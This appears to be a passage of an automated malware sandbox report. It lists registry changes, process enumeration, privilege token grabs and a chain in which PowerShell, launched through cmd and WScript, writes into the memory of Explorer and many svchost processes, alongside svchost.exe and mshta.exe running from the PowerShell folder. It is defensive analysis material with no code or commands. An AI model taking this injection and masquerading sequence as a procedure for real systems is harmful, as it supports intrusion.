Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\ICT = "133641655957085279" C:\Windows\system32\svchost.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\ITT = "133641655992024854" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\SplashScreen C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PTT = "133641655965644999" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133641655283604926" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1 C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133641655960914783" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU\ITT = "133641655790862123" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133641655751018336" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame\windows.immersivecontrolpanel_cw5n1h2txyewy!m C:\Windows\Explorer.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\system32\msdt.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4600 wrote to memory of 264 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4600 wrote to memory of 264 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4600 wrote to memory of 2652 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4600 wrote to memory of 2652 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2652 wrote to memory of 2736 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2652 wrote to memory of 2736 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2652 wrote to memory of 2148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 2652 wrote to memory of 2148 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 2148 wrote to memory of 1756 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 2148 wrote to memory of 1756 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1756 wrote to memory of 412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1756 wrote to memory of 412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1756 wrote to memory of 620 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1756 wrote to memory of 620 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 620 wrote to memory of 3488 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 620 wrote to memory of 2560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 1968 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 620 wrote to memory of 1372 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 1764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 620 wrote to memory of 1564 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 620 wrote to memory of 1124 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 2740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 1552 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 2728 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 1788 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 1736 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 620 wrote to memory of 3620 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 620 wrote to memory of 1132 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 3692 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 2312 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 1316 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 1116 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
